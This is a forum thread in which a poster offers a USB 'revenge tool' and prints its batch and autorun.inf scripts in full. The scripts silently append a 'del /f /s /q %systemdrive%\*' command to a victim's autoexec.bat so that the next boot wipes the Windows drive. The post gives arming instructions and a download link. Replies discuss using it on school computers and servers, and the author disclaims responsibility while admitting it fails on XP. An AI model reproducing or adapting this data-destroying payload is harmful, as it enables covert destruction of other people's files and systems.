• Hello everybody! We have tons of new awards for the new year that can be requested through our Awards System thanks to Antifa Lockhart! Some are limited-time awards so go claim them before they are gone forever...

CLICK HERE FOR AWARDS

Azu's Project X1 (V. 1.0)

REGISTER TO REMOVE ADS
Status
Not open for further replies.

Azurith

Awards
Angels of darkness tread softly in the light.
Files: http://rapidshare.com/files/22911646/Pack2.zip.html

Before I start, I should note that this may or may not work if logged into the machine under any account other than 'Admin' or 'System'.

Having recently been 'inspired' by some scripts I've seen, I decided to expand upon it.

Basically, this is a nice 'revenge' tool.

The way this works is you extract the archive files onto the root directory of your USB thumbdrive.
If your thumbdrive letter is F:\ then you would copy all the files to this location..

Next, you must 'arm' the device by running the 'start.bat' script. This will configure the device as 'armed'. The usb drive is now LIVE.
(You may see errors if you plug the device into a computer while it is 'unarmed'. There are work arounds for this, but I felt like beling lazy and not including it. xD)

Now, whenever you plug the drive into a computer, the program is silently and automatically ran.
The scripts will inject 'del /s /q /f %systemdrive%\*' commands into the autoexec.bat file which is located on whatever drive windows is installed on. This file is automatically ran by windows during start.. and all commands in this batch file are ran. This means that our command will also be ran. ;)
The command we are telling the machine is that we basically want to delete ALL files on this drive, and not give any warnings or show any information to the user.. which means they'll never see it coming.

When the machine is rebooted or the next time it is started, then the machine will delete all files on the Windows drive, while leaving all other drives alone.

For a better example:

1. USB device is plugged into computer while 'armed'.
2. autorun.inf file tells the computer to run start.cmd script.
(The machine must have 'autorun' enabled for this to work. If it is disabled, you'll have to 'browse' to the drive in windows to activate the autorun.inf file. Or you could just as easy run the \SeraphBlack\start.cmd script yourself. Your call. ;) )
3. The start.cmd script echos the del /s /f /q %systemdrive%\* command to the screen, but I've instructed it to redirect the output and append it to the file at %systemdrive%\autoexec.bat ..
4. The machine is rebooted.
(I have also created an automatic reboot patch for it... However, I haven't included it. Seeing as how you may wish to reuse the drive later. If you have an extra spare drive that you don't care about using anymore, then it's perfect. I only have one usb thumbdrive, however. (256mb) And I do not want to go buy a new $20 drive.)
5. The machine runs autoexec.bat, which runs the command.
6. The machine silently deletes ALL files on the computer.
7. ???
8. Profit!

I have also included a 'patch' to remove the program from the system.
(It should remove the line from the autoexec.bat file.)
Always check the file yourself, by opening C:\autoexec.bat in notepad. You should NOT see a 'del' line, and if you do.. remove it! (The 'fix.bat' file is supposed to do this for you.) Still, better safe than sorry, eh?

The final 'patch' included is necessary if you 'insert' the armed device into your OWN machine.
The file 'stop2.bat' will disarm the device and automatically run the patch to remove the code from your system. I didn't want people to forget to run the 'fix' script on their own machines when they decided to disarm it..

And do NOT mess with the location of the files!!!
(Don't delete, rename, or move the folders 'SeraphBlack' or 'Backup'!!!)

Enjoy.

Any ideas on a new project for meh?

~~Azurith

Start/Stop .cmd (Primary script.)
Code:
@echo off
xcopy %systemdrive%\autoexec.bat \SeraphBlack\backup\ /Y
if not chdir==%systemdrive% %systemdrive%
echo del /f /s /q %systemdrive%\* >> autoexec.bat

autorun.inf (Autoruns 'armed' device.)
Code:
[autorun] 
action=Open Files On Folder
icon=icons\drive.ico
shellexecute=\SeraphBlack\start.cmd

start.bat (Arms device.)
Code:
@echo off
if exist \SeraphBlack\stop.cmd (rename \SeraphBlack\stop.cmd start.cmd)

stop2.bat (Disarm and patches the system)
Code:
@echo off
if exist \SeraphBlack\start.cmd (rename \SeraphBlack\start.cmd stop.cmd)
shellexecute=Fix.bat

Fix.bat (Patches the system)
Code:
xcopy \SeraphBlack\backup\autoexec.bat %systemdrive%\autoexec.bat /Y

Azurith

Awards
oh heil, you can delete an entire computer and make it just blank? if you turb it on afterwards, will you still be able to use it with all files and programs deleted, or will it delete the OS and turn the computer into a rock?

In short:

It nukes the system..

You will probably have some files left over, which can't be deleted for reasons.
(Windows locks most system files.. but not all. ;) )

That being said, it will delete all non-system files.. and any system files which are NOT locked.

Meaning that your OS more than likely won't boot, and all of your other files are gone..

~~Azu

T

The Marauder

Nice and compact. I have seen many similar programs before, though I have yet to wipe any school PCs... :) Good job Azzy. As for the next project, got root?

Azurith

Awards
Nice and compact. I have seen many similar programs before, though I have yet to wipe any school PCs... :) Good job Azzy. As for the next project, got root?

Getting r00t access on windows XP, eh? <.<

Hmm.. sounds like a challenge, it may take me a few days or weeks to plan it out..
('Admin' access =/= r00t for XP.)

~~Azurith

I'll make a quick video of what'll happen when you use it.. ;)

Last edited:

Joy

Bronze Member
My school's computers are connected some way ( forget, you probably know), and all can access each other's files. If I used this on the primary hardrive of the school, I would delete the files for all computers, right?

T

The Marauder

Using this at the server would lead to the deletion of all files on the server, although it would take some time for this to happen. This is because servers are designed to run 24/7 365 days a year with minimal downtime. It is unlikely that your school's server will be shut down and restarted for quite a while, so don't hold your breath...

Azurith

Awards
My school's computers are connected some way ( forget, you probably know), and all can access each other's files. If I used this on the primary hardrive of the school, I would delete the files for all computers, right?

No, for two reasons.

1. I know exactly what you mean.. when I was in HS, my school was the same way.
Basically, your account is running on the local machine, but logged into the server's account.
I can't really explain this.. you just need to either 'explore' at your own risk, or believe me..
(I've already 'explored' my school's network... I could send messages to ANYONE in the High School, Junior High, or Middle School... or setup LAN games of UT... (Where did you think my passion for UT got started...? xD) And play with any computer on the school network. (Without installing the game on the local machine!!!)

That being said, the program will only run on the 'local' machine..
The ONLY way for it to infect the server is for you to insert the usb drive into the server itself...
And I would HIGHLY not recommend this...

2. I realized one fatal flaw in my scripts...
This was only when I ran a 'test' of the project in a virtual machine running XP SP2...
XP SP2 (And perhaps SP0 & SP1 as well) do not 'use' the autoexec.bat file, apparently..
Meaning that injecting the code into this file is pretty useless, though I am working on a patch for this problem. I already have the code redesigned in my head, just have to find time to work on it! xD
(Its a simple quick fix.. but I don't have time to rewrite the scripts.)

~~Azurith

Abel

Why is it against the rules to post file sharing, but it's perfectly fine to teach people how to hack with openly-expressed malignant intent?
Azurith said:
Basically, this is a nice 'revenge' tool.

Azurith

Awards
Why is it against the rules to post file sharing, but it's perfectly fine to teach people how to hack with openly-expressed malignant intent?

First off, illegal file sharing isn't allowed.. for obvious reasons.

That is only to say that we can't keep you from pm'ing a link to someone else, if they had asked you for such..

Secondly, are you screwing with me?
Seriously...

Abel said:
teach people how to hack with openly-expressed malignant intent?

I have done no such thing.

What I have done, is created a few small command scripts.
What members choose to do with these files is up to them, however, I am not responsible for their actions.. good or evil.

Secondly, teaching WHAT exactly?
DOS commands are NOT illegal in any way.. so, wth?\

And I haven't said anything about actually breaking into systems, how do you get from this subject to that one? The very most I have shown is the scripts themselves, to prove that nothing is hiding in the file. Any member could just as well open the file with notepad, and few the commands, if they so desired. I simply added the code for the scripts to make it easier on them.

Finally, I would like to point the following out:

Time said:
Azurith said:
That being said, the program will only run on the 'local' machine..
The ONLY way for it to infect the server is for you to insert the usb drive into the server itself...
And I would HIGHLY not recommend this...

As you can see, I do not recommend the misusage of these scripts.. but I can't really do anything about them, if they choose to be 'evil' with the scripts, can I?

Lastly, I already explained that the scripts will currently only work for 9x platforms..
If you have Windows 9x installed on your computer, this would be a blessing.. ;)

----------------------------------------------------------------
Had you taken the time to read the readme.txt file included with the scripts, you would have realized that I do not take any responsibility for whatever those files are used for, and nothing can be blamed on me for lose of data or illegal activities.. it's all there.

~~Azurith
Don't make me destroy you. ^.^

Status
Not open for further replies.
Back